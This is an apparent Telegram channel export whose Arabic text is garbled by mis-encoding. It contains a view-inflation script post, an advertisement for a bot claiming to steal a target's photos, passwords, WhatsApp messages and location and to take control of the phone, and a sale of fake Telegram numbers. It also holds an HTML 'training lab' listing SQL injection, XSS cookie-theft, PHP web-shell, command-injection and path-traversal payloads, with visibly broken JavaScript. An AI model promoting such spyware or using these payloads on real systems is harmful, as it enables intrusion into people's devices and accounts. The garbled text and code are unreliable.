๐ŸŒฝ learn
488 subscribers
34 photos
5 videos
51 files
57 links
the world
Download Telegram
.
โค4๐Ÿ˜2๐Ÿฅฐ1
Forwarded from ๐ŸฆˆSHARK NET
.trashed-1781696855-ุฑุดู‚_ุชู„ูƒุฑุงู….py
3.1 KB
eadat rashq tilikram
hata rabit manshur wakhaliyh shaghal bikhalfayh wahu yajib mushahadat kulama khaliatuh shighal kulama azad mushahadat lataghayar masdar watukhmut aladawat watasir sharif watakul nas maliun dhimuh aly taghayur ay huquq aw yunshar bidun dhikr masdar 'asasiin๐Ÿฆˆ
@X0XjX


ุจุณู… ุงู„ู„ู‡ ุงู„ุฑุญู…ู† ุฑุญูŠู… โค๏ธโ€๐Ÿ”ฅ

ุงุฏุงุช ุฑุดู‚ ุชู„ูƒุฑุงู…
ุญุท ุฑุงุจุท ู…ู†ุดูˆุฑ ูˆุฎู„ูŠู‡ ุดุบุงู„ ุจุฎู„ููŠู‡ ูˆู‡ูˆ ูŠุฌุจ ู…ุดุงู‡ุฏุงุช ูƒู„ู…ุง ุฎู„ูŠุชู‡ ุดุบุงู„ ูƒู„ู…ุง ุงุฒุงุฏ ู…ุดุงู‡ุฏุงุช ู„ุง ุชุบูŠุฑ ู…ุตุฏุฑ ูˆุชุฎู…ุท ุงู„ุงุฏุงุช ูˆุชุตูŠุฑ ุดุฑูŠู ูˆุชูƒูˆู„ ู†ุงุณ ู…ุงู„ูŠ ุฐู…ู‡ ุงู„ูŠ ูŠุบูŠุฑ ุงูŠ ุญู‚ูˆู‚ ุงูˆ ูŠู†ุดุฑ ุจุฏูˆู† ุฐูƒุฑ ู…ุตุฏุฑ ุงุณุงุณูŠ ๐Ÿฆˆโ˜บ๏ธ
@X0XjX
๐Ÿฅฐ2๐Ÿ˜˜2โค1๐Ÿ˜1๐Ÿ’˜1
ุงู‚ูˆูŠ ุจู€//ู€ูˆุช ุงุฎู€ู€//ู€ุชู€//ู€ุฑุงู‚ ุจู€//ู€ุฑู‚ู€//ู€ู… ุนุงุฏ ู…ู† ุฌุฏูŠุฏ ๐Ÿ”ฅ๐Ÿ”ฅ
ู…ุง ูŠู…ูƒู† ุงู† ูŠูุนู„ ุงู„ุจู€//ู€ูˆุช ุนู† ุทู€//ู€ุฑูŠู‚ ุฑู‚ู€//ู€ู… โ“
ู…ุนุฑู ุงู„ุจูˆุช ๐Ÿ“ฃ
https://t.me/Osint_vNbot?start=0004hy5k44
ูŠู‚ุฏุฑ ๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡

ูŠุณู€//ู€ุŒุŒุŒู€ู€ุญุจ ุงู„ุตู€@ู€ูˆุฑ
ูŠุฎู€//ู€ุŒุŒุŒู€ุชุฑู‚ ู…ูˆู‚ู€//ู€ุน ุงู„ุดู€//ู€ุฎุต ุจุงู„ุชูุตูŠู„ ๐ŸŒ
ูŠุณู€//ู€ุญุจ ุฌู…ู€//ู€ูŠุน ุฌูŠู…ู€ุŒุŒุŒู€//ู€ูŠู„ุงุช ุงู„ู‡ุงุชู ๐Ÿ–ฅ
ูŠุณู€//ู€ุŒุŒุŒู€ุญุจ ุฌู…ู€//ู€ูŠุน ุงุฑู‚ุงู… ุงู„ู‡ุงุชู๐Ÿ”น
ูŠุณู€//ู€ุŒุŒุŒู€ุญุจ ุฌู…ู€//ู€ูŠุน ุญุณุงุจุงุช ุงู„ุดุฎุต
ูŠุณู€//ู€ุŒุŒุŒู€ุญุจ ุจุงุณูˆุฑุฏุงุช ุงู„ุญุณุงุจุงุช โฑ
ูˆ ุชุญูƒู… ูƒุงู…ู„ ููŠ ู…ู„ูุงุช ุงู„ุฌู‡ู€//ู€ุงุฒ ู…ุน ุฃู…ุฑ ุชุดู€//ู€ููŠุฑ ุงู„ู…ู„ู€//ู€ูุงุช๐Ÿ“ž
ูŠุณู€//ู€ุŒุŒุŒู€ุญุจ ุฌู…ู€//ู€ูŠุน ุฑุณู€//ู€ุงุฆู„ ุงู„ูˆุงุชู€ู€//ู€ุณุงุจ ๐Ÿ“ž
ุชุบู€//ู€ูŠุฑ ุฎู„ู€//ู€ููŠุฉ ุงู„ู‡ุงุชู ูˆ ู…ุดุงู‡ุฏุฉ ุงู„ู‡ู€ู€//ู€ุงุชู ู„ุงูŠู€//ู€ู
ูŠุฑุฌูŠ ุงู„ุนู„ู… ุฃู† ู‡ุฐุง ุงู„ุงุตุฏุงุฑ ุฎุงู„ูŠ ู…ู† ุงู„ุงุฎุทุงุก ุชู…ุงู…ุง ุงุตุฏุงุฑ V6
ู…ุนุฑู ุงู„ุจูˆุช

https://t.me/Osint_vNbot?start=0004hy5k44

๐Ÿ”นุฃุนู„ู† ุนู† ูƒุงู…ู„ ุงุฎู„ุงุก ู…ุณุคูˆู„ูŠุชูŠ ุนู† ุฃูŠ ุงุณุชุฎุฏุงู… ู…ุณูŠุฆ ุงูˆ ููŠ ุบุฑุถ ุงู„ุดุฑ ู„ู‡ุฐู‡ ุงู„ุทุฑู‚ุŒ ุงุณุชุฎุฏู…ูˆ ู‡ุฐู‡ ุงู„ู…ู‡ุงุฑุงุช ุจุดูƒู„ ุฃุฎู„ุงู‚ูŠ ูˆุงุญุชุฑุงููŠ ูู‚ุท.
๐Ÿ‘2โค1๐Ÿฅฐ1๐Ÿ˜1๐Ÿ˜˜1
<!DOCTYPE html>
<html lang="ar">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>ู…ูˆู‚ุน ุงุฎุชุจุงุฑ ุงุฎุชุฑุงู‚ ุชุนู„ูŠู…ูŠ - Vulnerable Lab</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}

body {
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
background: linear-gradient(135deg, #0a0a0a 0%, #1a1a2e 100%);
min-height: 100vh;
color: #fff;
}

.header {
background: linear-gradient(135deg, #e74c3c, #c0392b);
padding: 20px;
text-align: center;
box-shadow: 0 4px 15px rgba(0,0,0,0.3);
}

.header h1 {
font-size: 2rem;
margin-bottom: 5px;
}

.header p {
font-size: 0.9rem;
opacity: 0.9;
}

.warning {
background: #ff9800;
color: #000;
padding: 10px;
text-align: center;
font-weight: bold;
}

.container {
max-width: 1200px;
margin: 0 auto;
padding: 20px;
}

.vulnerability-card {
background: rgba(255,255,255,0.1);
backdrop-filter: blur(10px);
border-radius: 15px;
padding: 20px;
margin-bottom: 20px;
border-left: 5px solid #e74c3c;
}

.vulnerability-card h2 {
color: #ff6b6b;
margin-bottom: 15px;
}

.vulnerability-card h3 {
color: #ffa502;
margin: 15px 0 10px 0;
}

input, textarea, select {
background: rgba(0,0,0,0.5);
border: 1px solid #555;
padding: 10px;
color: #fff;
border-radius: 5px;
width: 100%;
max-width: 400px;
margin: 5px 0;
}

button {
background: #e74c3c;
color: white;
border: none;
padding: 10px 20px;
border-radius: 5px;
cursor: pointer;
transition: transform 0.2s;
}

button:hover {
transform: scale(1.05);
background: #c0392b;
}

.result {
background: rgba(0,0,0,0.7);
padding: 15px;
border-radius: 8px;
margin-top: 15px;
font-family: monospace;
overflow-x: auto;
}

.sql-result, .xss-result, .upload-result {
color: #2ecc71;
}

.error {
color: #e74c3c;
}

footer {
text-align: center;
padding: 20px;
background: rgba(0,0,0,0.5);
margin-top: 40px;
}

.badge {
display: inline-block;
background: #e74c3c;
padding: 3px 8px;
border-radius: 3px;
font-size: 0.7rem;
margin-left: 10px;
}

table {
width: 100%;
border-collapse: collapse;
margin-top: 10px;
}

th, td {
border: 1px solid #555;
padding: 8px;
text-align: left;
}

th {
background: #e74c3c;
}

.login-box {
background: rgba(0,0,0,0.5);
padding: 20px;
border-radius: 10px;
max-width: 350px;
margin: 20px auto;
}

.login-box input {
width: 100%;
๐Ÿ˜˜2โค1๐Ÿ‘1๐Ÿฅฐ1๐Ÿ˜1
margin: 10px 0;
}
</style>
</head>
<body>
<div class="header">
<h1>๐Ÿ”“ ู…ูˆู‚ุน ุงุฎุชุจุงุฑ ุงู„ุงุฎุชุฑุงู‚ ุงู„ุชุนู„ูŠู…ูŠ ๐Ÿ”“</h1>
<p>Vulnerable Web Application - ู„ู„ุฃุบุฑุงุถ ุงู„ุชุนู„ูŠู…ูŠุฉ ูู‚ุท</p>
</div>
<div class="warning">
โš ๏ธ ู‡ุฐุง ุงู„ู…ูˆู‚ุน ู„ู„ุฃุบุฑุงุถ ุงู„ุชุนู„ูŠู…ูŠุฉ ูู‚ุท. ู„ุง ุชุณุชุฎุฏู…ู‡ ุนู„ู‰ ุฃุฌู‡ุฒุฉ ู„ุง ุชู…ู„ูƒู‡ุง ุฃูˆ ุจุฏูˆู† ุฅุฐู†! โš ๏ธ
</div>

<div class="container">
<!-- ุซุบุฑุฉ 1: SQL Injection -->
<div class="vulnerability-card">
<h2>๐Ÿ”ด 1. ุซุบุฑุฉ ุญู‚ู† SQL (SQL Injection) <span class="badge">ู…ุณุชูˆู‰: ุณู‡ู„</span></h2>
<p>ู‡ุฐู‡ ุงู„ุตูุญุฉ ุชุนุฑุถ ุจูŠุงู†ุงุช ุงู„ู…ุณุชุฎุฏู…ูŠู†. ุญุงูˆู„ ุฅุฏุฎุงู„: <code>' OR '1'='1</code> ู„ุนุฑุถ ุฌู…ูŠุน ุงู„ุจูŠุงู†ุงุช!</p>

<h3>๐Ÿ” ุงู„ุจุญุซ ุนู† ู…ุณุชุฎุฏู…:</h3>
<input type="text" id="sql-search" placeholder="ุฃุฏุฎู„ ุงุณู… ุงู„ู…ุณุชุฎุฏู…...">
<button onclick="sql_injection()">๐Ÿ” ุจุญุซ</button>
<div id="sql-result" class="result"></div>

<h3>๐Ÿ’ก ุฃู…ุซู„ุฉ ู„ู„ุงุฎุชุจุงุฑ:</h3>
<code>admin' --</code><br>
<code>' OR '1'='1</code><br>
<code>admin' OR '1'='1' --</code><br>
<code>'; DROP TABLE users; --</code>
</div>

<!-- ุซุบุฑุฉ 2: XSS (Cross-Site Scripting) -->
<div class="vulnerability-card">
<h2>๐ŸŸ  2. ุซุบุฑุฉ ุงู„ุจุฑู…ุฌุฉ ุงู„ู†ุตูŠุฉ ุนุจุฑ ุงู„ู…ูˆุงู‚ุน (XSS) <span class="badge">ู…ุณุชูˆู‰: ุณู‡ู„</span></h2>
<p>ู‡ุฐู‡ ุงู„ุตูุญุฉ ุชุนุฑุถ ู…ุง ุชูƒุชุจู‡ ุฏูˆู† ุชู†ู‚ูŠุฉ. ุฌุฑุจ: <code>&lt;script&gt;alert('Hacked!')&lt;/script&gt;</code></p>

<h3>๐Ÿ’ฌ็•™่จ€:</h3>
<input type="text" id="xss-input" placeholder="ุงูƒุชุจ ุชุนู„ูŠู‚ูƒ...">
<button onclick="xss_attack()">๐Ÿ“ ุฅุฑุณุงู„</button>
<div id="xss-result" class="result"></div>

<h3>๐Ÿ’ก ุฃู…ุซู„ุฉ ู„ู„ุงุฎุชุจุงุฑ:</h3>
<code>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</code><br>
<code>&lt;img src=x onerror=alert(1)&gt;</code><br>
<code>&lt;body onload=alert('XSS')&gt;</code><br>
<code>&lt;svg onload=alert(1)&gt;</code>
</div>

<!-- ุซุบุฑุฉ 3: ุฑูุน ุงู„ู…ู„ูุงุช ุงู„ุฎุจูŠุซุฉ -->
<div class="vulnerability-card">
<h2>๐ŸŸก 3. ุฑูุน ุงู„ู…ู„ูุงุช ุงู„ุฎุจูŠุซุฉ (Malicious File Upload) <span class="badge">ู…ุณุชูˆู‰: ู…ุชูˆุณุท</span></h2>
<p>ุญุงูˆู„ ุฑูุน ู…ู„ู ู†ุตูŠ ูŠุญุชูˆูŠ ุนู„ู‰ ูƒูˆุฏ PHP ุฃูˆ JavaScript!</p>

<h3>๐Ÿ“ ุฑูุน ู…ู„ู:</h3>
<input type="file" id="file-upload" accept=".txt,.php,.html,.js">
<button onclick="upload_file()">๐Ÿ“ค ุฑูุน ุงู„ู…ู„ู</button>
<div id="upload-result" class="result"></div>

<h3>๐Ÿ’ก ุฃู…ุซู„ุฉ: ุฃู†ุดุฆ ู…ู„ู test.php ุจุงู„ู…ุญุชูˆู‰:</h3>
<code>&lt;?php system($_GET['cmd']); ?&gt;</code>
</div>

<!-- ุซุบุฑุฉ 4: Command Injection -->
<div class="vulnerability-card">
<h2>๐ŸŸข 4. ุญู‚ู† ุงู„ุฃูˆุงู…ุฑ (Command Injection) <span class="badge">ู…ุณุชูˆู‰: ุณู‡ู„</span></h2>
<p>ู‡ุฐู‡ ุงู„ุตูุญุฉ ุชู†ูุฐ ุฃูˆุงู…ุฑ ุงู„ู†ุธุงู…. ุฌุฑุจ: <code>127.0.0.1; ls</code></p>

<h3>๐ŸŒ ping:</h3>
<input type="text" id="cmd-input" placeholder="ุฃุฏุฎู„ ุนู†ูˆุงู† IP...">
<button onclick="cmd_injection()">๐Ÿ“ก Ping</button>
<div id="cmd-result" class="result"></div>

<h3>๐Ÿ’ก ุฃู…ุซู„ุฉ ู„ู„ุงุฎุชุจุงุฑ:</h3>
<code>127.0.0.1; cat /etc/passwd</code><br>
<code>127.0.0.1 | whoami</code><br>
<code>127.0.0.1 && ls -la</code><br>
<code>127.0.0.1 || dir</code>
</div>

<!-- ุซุบุฑุฉ 5: ุชุณุฌูŠู„ ุฏุฎูˆู„ ุถุนูŠู -->
<div class="vulnerability-card">
<h2>๐Ÿ”ต 5. ุซุบุฑุฉ ุงู„ู…ุตุงุฏู‚ุฉ (Authentication Bypass) <span class="badge">ู…ุณุชูˆู‰: ุณู‡ู„</span></h2>
<p>ุญุงูˆู„ ุชุฌุงูˆุฒ ุตูุญุฉ ุชุณุฌูŠู„ ุงู„ุฏุฎูˆู„ ุจุงุณุชุฎุฏุงู… ุญู‚ู† SQL!</p>

<div class="login-box">
โค2๐Ÿ˜2๐Ÿฅฐ1๐Ÿ˜˜1
<h3>๐Ÿ” ุชุณุฌูŠู„ ุงู„ุฏุฎูˆู„ (Admin Panel)</h3>
<input type="text" id="login-username" placeholder="ุงุณู… ุงู„ู…ุณุชุฎุฏู…">
<input type="password" id="login-password" placeholder="ูƒู„ู…ุฉ ุงู„ู…ุฑูˆุฑ">
<button onclick="login_attempt()">๐Ÿšช ุฏุฎูˆู„</button>
<div id="login-result" class="result" style="margin-top: 10px;"></div>
</div>

<h3>๐Ÿ’ก ุฃู…ุซู„ุฉ ู„ู„ุงุฎุชุจุงุฑ:</h3>
<code>admin' --</code> (ูƒู„ู…ุฉ ุงู„ู…ุฑูˆุฑ ุฃูŠ ุดูŠุก)<br>
<code>' OR '1'='1</code><br>
<code>admin' OR '1'='1' --</code>
</div>

<!-- ุซุบุฑุฉ 6: IDOR -->
<div class="vulnerability-card">
<h2>๐ŸŸฃ 6. ุซุบุฑุฉ IDOR (Insecure Direct Object Reference) <span class="badge">ู…ุณุชูˆู‰: ู…ุชูˆุณุท</span></h2>
<p>ุญุงูˆู„ ุชุบูŠูŠุฑ ุฑู‚ู… ุงู„ู…ุนุฑู ู„ุนุฑุถ ุจูŠุงู†ุงุช ู…ุณุชุฎุฏู…ูŠู† ุขุฎุฑูŠู†!</p>

<h3>๐Ÿ“„ ุนุฑุถ ุงู„ู…ู„ู ุงู„ุดุฎุตูŠ:</h3>
<input type="number" id="idor-id" placeholder="ุฃุฏุฎู„ ุฑู‚ู… ุงู„ู…ุณุชุฎุฏู… (1-5)" value="1">
<button onclick="idor_attack()">๐Ÿ‘ค ุนุฑุถ</button>
<div id="idor-result" class="result"></div>
</div>

<!-- ุซุบุฑุฉ 7: Path Traversal -->
<div class="vulnerability-card">
<h2>๐ŸŸค 7. ุซุบุฑุฉ ุงุฌุชูŠุงุฒ ุงู„ู…ุณุงุฑ (Path Traversal) <span class="badge">ู…ุณุชูˆู‰: ู…ุชูˆุณุท</span></h2>
<p>ุญุงูˆู„ ู‚ุฑุงุกุฉ ู…ู„ูุงุช ุงู„ู†ุธุงู… ุงู„ุญุณุงุณุฉ!</p>

<h3>๐Ÿ“‚ ุนุฑุถ ู…ู„ู:</h3>
<input type="text" id="path-input" placeholder="ุงุณู… ุงู„ู…ู„ู (ู…ุซุงู„: test.txt)">
<button onclick="path_traversal()">๐Ÿ“– ู‚ุฑุงุกุฉ</button>
<div id="path-result" class="result"></div>

<h3>๐Ÿ’ก ุฃู…ุซู„ุฉ ู„ู„ุงุฎุชุจุงุฑ:</h3>
<code>../../../../etc/passwd</code><br>
<code>../../windows/win.ini</code><br>
<code>../config.php</code>
</div>
</div>

<footer>
<p>๐Ÿ”’ ู…ูˆู‚ุน ุงุฎุชุจุงุฑ ุงุฎุชุฑุงู‚ ุชุนู„ูŠู…ูŠ - ู„ู„ู…ุทูˆุฑูŠู† ูˆุงู„ู…ุฎุชุจุฑูŠูŠู† ุงู„ุฃุฎู„ุงู‚ูŠูŠู† ๐Ÿ”’</p>
<p>Developed by @X0XjX - ู„ุฃุบุฑุงุถ ุชุนู„ูŠู…ูŠุฉ ูู‚ุท</p>
<p>โš ๏ธ ู„ุง ุชุณุชุฎุฏู… ู‡ุฐู‡ ุงู„ุซุบุฑุงุช ุนู„ู‰ ู…ูˆุงู‚ุน ุญู‚ูŠู‚ูŠุฉ - ู‡ุฐุง ุงู„ู…ูˆู‚ุน ุขู…ู† ูˆู…ุนุฒูˆู„ โš ๏ธ</p>
</footer>

<script>
// ู‚ุงุนุฏุฉ ุจูŠุงู†ุงุช ูˆู‡ู…ูŠุฉ
const users = [
{ id: 1, username: "admin", password: "admin123", email: "admin@test.com", role: "ู…ุฏูŠุฑ ุงู„ู†ุธุงู…" },
{ id: 2, username: "user1", password: "pass123", email: "user1@test.com", role: "ู…ุณุชุฎุฏู… ุนุงุฏูŠ" },
{ id: 3, username: "test", password: "test123", email: "test@test.com", role: "ู…ุฎุชุจูุฑ" },
{ id: 4, username: "hacker", password: "hack123", email: "hacker@test.com", role: "ู‚ุฑุตุงู† ุฃุฎู„ุงู‚ูŠ" },
{ id: 5, username: "guest", password: "guest", email: "guest@test.com", role: "ุฒุงุฆุฑ" }
];

// 1. SQL Injection
function sql_injection() {
let input = document.getElementById('sql-search').value;
let resultDiv = document.getElementById('sql-result');

// ู…ุญุงูƒุงุฉ ุซุบุฑุฉ SQL
if (input.includes("'") input.includes("OR") input.includes("--")) {
// ุนุฑุถ ุฌู…ูŠุน ุงู„ุจูŠุงู†ุงุช (ู…ุญุงูƒุงุฉ ุงู„ุญู‚ู†)
let html = '<table><tr><th>ID</th><th>Username</th><th>Email</th><th>Role</th></tr>';
users.forEach(user => {
html += <tr><td>${user.id}</td><td>${user.username}</td><td>${user.email}</td><td>${user.role}</td></tr>;
});
html += '</table>';
resultDiv.innerHTML = <div class="sql-result">โœ… ุชู… ุญู‚ู† SQL ุจู†ุฌุงุญ! ุชู… ุนุฑุถ ุฌู…ูŠุน ุงู„ู…ุณุชุฎุฏู…ูŠู†:<br>${html}</div>;
resultDiv.innerHTML += <div class="error">โš ๏ธ ุชุญุฐูŠุฑ: ู‡ุฐู‡ ุซุบุฑุฉ ุญู‚ูŠู‚ูŠุฉ ููŠ ู‚ูˆุงุนุฏ ุงู„ุจูŠุงู†ุงุช! ุชุนู„ู… ูƒูŠููŠุฉ ุงุณุชุฎุฏุงู… prepared statements.</div>;
} else if (input) {
let found = users.find(u => u.username === input);
๐Ÿ˜˜2โค1๐Ÿ‘1๐Ÿฅฐ1๐Ÿ˜1
if (found) {
resultDiv.innerHTML = <div class="sql-result">โœ… ุชู… ุงู„ุนุซูˆุฑ ุนู„ู‰ ุงู„ู…ุณุชุฎุฏู…: ${found.username} | ุงู„ุจุฑูŠุฏ: ${found.email} | ุงู„ุฏูˆุฑ: ${found.role}</div>;
} else {
resultDiv.innerHTML = <div class="error">โŒ ู„ู… ูŠุชู… ุงู„ุนุซูˆุฑ ุนู„ู‰ ุงู„ู…ุณุชุฎุฏู…: ${input}</div>;
}
} else {
resultDiv.innerHTML = '<div class="error">โŒ ุงู„ุฑุฌุงุก ุฅุฏุฎุงู„ ุงุณู… ู…ุณุชุฎุฏู…</div>';
}
}

// 2. XSS Attack
function xss_attack() {
let input = document.getElementById('xss-input').value;
let resultDiv = document.getElementById('xss-result');

if (input) {
// ู…ุญุงูƒุงุฉ XSS - ุชุนุฑุถ ุงู„ู†ุต ุฏูˆู† ุชู†ู‚ูŠุฉ
resultDiv.innerHTML = <div>๐Ÿ’ฌ ุชุนู„ูŠู‚ูƒ: ${input}</div>;
if (input.includes("<script>") input.includes("onerror") input.includes("onload")) {
resultDiv.innerHTML += <div class="error">โš ๏ธ ุชู… ุงูƒุชุดุงู ู‡ุฌูˆู… XSS! ู‡ุฐุง ุงู„ูƒูˆุฏ ุชู… ุชู†ููŠุฐู‡ ููŠ ุงู„ู…ุชุตูุญ.</div>;
}
} else {
resultDiv.innerHTML = '<div class="error">โŒ ุงู„ุฑุฌุงุก ูƒุชุงุจุฉ ุชุนู„ูŠู‚</div>';
}
}

// 3. File Upload
function upload_file() {
let fileInput = document.getElementById('file-upload');
let resultDiv = document.getElementById('upload-result');

if (fileInput.files.length > 0) {
let file = fileInput.files[0];
resultDiv.innerHTML = <div class="upload-result">โœ… ุชู… ุฑูุน ุงู„ู…ู„ู: ${file.name} (${(file.size/1024).toFixed(2)} KB)</div>;

if (file.name.endsWith('.php') file.name.endsWith('.html') file.name.endsWith('.js')) {
resultDiv.innerHTML += <div class="error">โš ๏ธ ุชุญุฐูŠุฑ: ู‡ุฐุง ุงู„ู…ู„ู ูŠู…ูƒู† ุชู†ููŠุฐู‡ ุนู„ู‰ ุงู„ุฎุงุฏู…! ุซุบุฑุฉ ุฑูุน ุงู„ู…ู„ูุงุช ุงู„ุฎุจูŠุซุฉ.</div>;
resultDiv.innerHTML += <div class="sql-result">๐Ÿ’ก ูƒู…ุฎุชุฑู‚: ูŠู…ูƒู†ูƒ ุงู„ุขู† ุงู„ูˆุตูˆู„ ุฅู„ู‰ ุงู„ู…ู„ู ุนุจุฑ: http://target.com/uploads/${file.name}</div>;
}
} else {
resultDiv.innerHTML = '<div class="error">โŒ ุงู„ุฑุฌุงุก ุงุฎุชูŠุงุฑ ู…ู„ู</div>';
}
}

// 4. Command Injection
function cmd_injection() {
let input = document.getElementById('cmd-input').value;
let resultDiv = document.getElementById('cmd-result');

if (input) {
let output = "";
if (input.includes(";") input.includes("|") input.includes("&&") input.includes("")) {
output = "๐Ÿ“ ู…ุญุงูƒุงุฉ ุชู†ููŠุฐ ุงู„ุฃู…ุฑ:\n";
if (input.includes("ls") || input.includes("dir")) {
output += "Desktop\nDocuments\nDownloads\nconfig.php\nindex.php\n";
}
if (input.includes("cat") || input.includes("type")) {
output += "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n";
}
if (input.includes("whoami")) {
output += "www-data\n";
}
output += \nโš ๏ธ ุชู… ุญู‚ู† ุงู„ุฃู…ุฑ: ${input};
} else {
output = ๐Ÿ“ Pinging ${input}...\nReply from ${input}: bytes=32 time<1ms TTL=64\nReply from ${input}: bytes=32 time<1ms TTL=64;
}
resultDiv.innerHTML = <div class="sql-result"><pre>${output}</pre></div>;
if (input.includes(";") || input.includes("|")) {
resultDiv.innerHTML += <div class="error">โš ๏ธ ู‡ุฐู‡ ุซุบุฑุฉ ุญู‚ู† ุงู„ุฃูˆุงู…ุฑ! ูŠู…ูƒู† ู„ู„ู…ู‡ุงุฌู… ุชู†ููŠุฐ ุฃูŠ ุฃู…ุฑ ุนู„ู‰ ุงู„ุฎุงุฏู….</div>;
}
๐Ÿฅฐ2๐Ÿ˜2๐Ÿ˜˜2
} else {
resultDiv.innerHTML = '<div class="error">โŒ ุงู„ุฑุฌุงุก ุฅุฏุฎุงู„ ุนู†ูˆุงู† IP</div>';
}
}

// 5. Login Bypass
function login_attempt() {
let username = document.getElementById('login-username').value;
let password = document.getElementById('login-password').value;
let resultDiv = document.getElementById('login-result');

// ู…ุญุงูƒุงุฉ ุซุบุฑุฉ SQL ููŠ ุชุณุฌูŠู„ ุงู„ุฏุฎูˆู„
if (username.includes("'") username.includes("OR") username.includes("--")) {
resultDiv.innerHTML = <div class="sql-result">โœ… ุชู… ุชุฌุงูˆุฒ ุชุณุฌูŠู„ ุงู„ุฏุฎูˆู„! ู…ุฑุญุจุงู‹ ู…ุฏูŠุฑ ุงู„ู†ุธุงู….<br>ุชู… ุงู„ุฏุฎูˆู„ ุจุญู‚ู† SQL: ${username}</div>;
resultDiv.innerHTML += <div class="error">โš ๏ธ ุชุญุฐูŠุฑ: ุซุบุฑุฉ ุฎุทูŠุฑุฉ! ูŠู…ูƒู† ู„ุฃูŠ ุดุฎุต ุงู„ุฏุฎูˆู„ ุจุฏูˆู† ูƒู„ู…ุฉ ู…ุฑูˆุฑ.</div>;
} else {
let found = users.find(u => u.username === username && u.password === password);
if (found) {
resultDiv.innerHTML = <div class="sql-result">โœ… ู…ุฑุญุจุงู‹ ${found.username}! ุชู… ุชุณุฌูŠู„ ุงู„ุฏุฎูˆู„ ุจู†ุฌุงุญ. ุฏูˆุฑูƒ: ${found.role}</div>;
} else {
resultDiv.innerHTML = <div class="error">โŒ ุงุณู… ุงู„ู…ุณุชุฎุฏู… ุฃูˆ ูƒู„ู…ุฉ ุงู„ู…ุฑูˆุฑ ุบูŠุฑ ุตุญูŠุญุฉ</div>;
}
}
}

// 6. IDOR Attack
function idor_attack() {
let id = parseInt(document.getElementById('idor-id').value);
let resultDiv = document.getElementById('idor-result');

let found = users.find(u => u.id === id);
if (found) {
resultDiv.innerHTML = <div class="sql-result">โœ… ู…ู„ู ุงู„ู…ุณุชุฎุฏู… ุฑู‚ู… ${id}:<br>ุงู„ุงุณู…: ${found.username}<br>ุงู„ุจุฑูŠุฏ: ${found.email}<br>ุงู„ุฏูˆุฑ: ${found.role}</div>;
if (id !== 1) {
resultDiv.innerHTML += <div class="error">โš ๏ธ ุซุบุฑุฉ IDOR! ูŠู…ูƒู†ูƒ ุนุฑุถ ุจูŠุงู†ุงุช ู…ุณุชุฎุฏู…ูŠู† ุขุฎุฑูŠู† ุจู…ุฌุฑุฏ ุชุบูŠูŠุฑ ุฑู‚ู… ุงู„ู…ุนุฑู.</div>;
}
} else {
resultDiv.innerHTML = <div class="error">โŒ ู„ุง ูŠูˆุฌุฏ ู…ุณุชุฎุฏู… ุจุงู„ุฑู‚ู… ${id}</div>;
}
}

// 7. Path Traversal
function path_traversal() {
let path = document.getElementById('path-input').value;
let resultDiv = document.getElementById('path-result');

if (path) {
if (path.includes("..") path.includes("etc/passwd") path.includes("win.ini")) {
resultDiv.innerHTML = <div class="sql-result">โœ… ุชู… ู‚ุฑุงุกุฉ ุงู„ู…ู„ู: ${path}<br><br>${'='*50}<br>root:x:0:0:root:/root:/bin/bash<br>daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin<br>bin:x:2:2:bin:/bin:/usr/sbin/nologin<br>www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin<br>${'='*50}<br><br>โš ๏ธ ู‡ุฐู‡ ุซุบุฑุฉ ุงุฌุชูŠุงุฒ ุงู„ู…ุณุงุฑ! ูŠู…ูƒู† ู„ู„ู…ู‡ุงุฌู… ู‚ุฑุงุกุฉ ุฃูŠ ู…ู„ู ุนู„ู‰ ุงู„ุฎุงุฏู….</div>;
} else {
resultDiv.innerHTML = <div class="upload-result">โœ… ุชู… ู‚ุฑุงุกุฉ ุงู„ู…ู„ู: ${path}<br><br>ู…ุญุชูˆู‰ ุงู„ู…ู„ู: ู‡ุฐุง ู…ู„ู ุชุฌุฑูŠุจูŠ ู„ุฃุบุฑุงุถ ุชุนู„ูŠู…ูŠุฉ.</div>;
}
} else {
resultDiv.innerHTML = '<div class="error">โŒ ุงู„ุฑุฌุงุก ุฅุฏุฎุงู„ ุงุณู… ุงู„ู…ู„ู</div>';
}
}
</script>
</body>
</html>
๐Ÿ˜3โค1๐Ÿ‘1๐Ÿ˜˜1
Forwarded from ๐ŸฆˆSHARK NET
hadha alkud tuqdir tusawiy ealaa shakl milafin watafatih falu mutafahik yasir mawqie hadha alkud almukhasas liaikhtibar kalimat almurur bi 7 kub kuli thagharih washaghlih tabean swit hadha alramz tueibat ealayh wadifat kam shy min dhaka' tabiean
@X0XjX

ู‡ุฐุง ูƒูˆุฏ ุชู‚ุฏุฑ ุชุณูˆูŠ ุนู„ู‰ ุดูƒู„ ู…ู„ู ูˆุชูุชุญู‡ ูู„ ู…ุชุตูุญูƒ ูŠุตูŠุฑ ู…ูˆู‚ุน ู‡ุฐุง ูƒูˆุฏ ู…ุฎุตุต ู„ุฎุชุจุงุฑ ุงู„ุงุฎุชุฑุงู‚ ุจูŠ 7 ุซุบุฑุงุช ูƒู„ ุซุบุฑู‡ ูˆุดุบู„ู‡ ุทุจุนู† ุณูˆูŠุช ู‡ุฐุง ูƒูˆุฏ ุชุนุจุช ุนู„ูŠู‡ ูˆุถูุช ูƒู… ุดูŠ ู…ู† ุฐูƒุงุก ุทุจุนู† โค๏ธโ€๐Ÿ”ฅ
@X0XjX
โค3๐Ÿ‘2๐Ÿ˜2
Forwarded from ๐ŸฆˆSHARK NET
ุงู„ูŠ ูŠุฑูŠุฏ ุฑู‚ู… ู…ุฒูŠู ุชู„ูƒุฑุงู… ุณุนุฑ 15 ู†ุฌู…ู‡ ุจุณ ุชุฌูŠูƒ ุฑุณุงู„ู‡ ุนู„ู‰ ุงูŠู…ูŠู„ ูˆุชู†ุทูŠู†ูŠ ู„ุดูƒุฑูƒ ุฑุณูˆู… ุญุชุง ู…ุง ูŠุจู†ุฏ ุญุณุงุจ 1.70ุฏ.ุน ุฑู‚ู… ุจุฑุฒูŠู„ูŠ
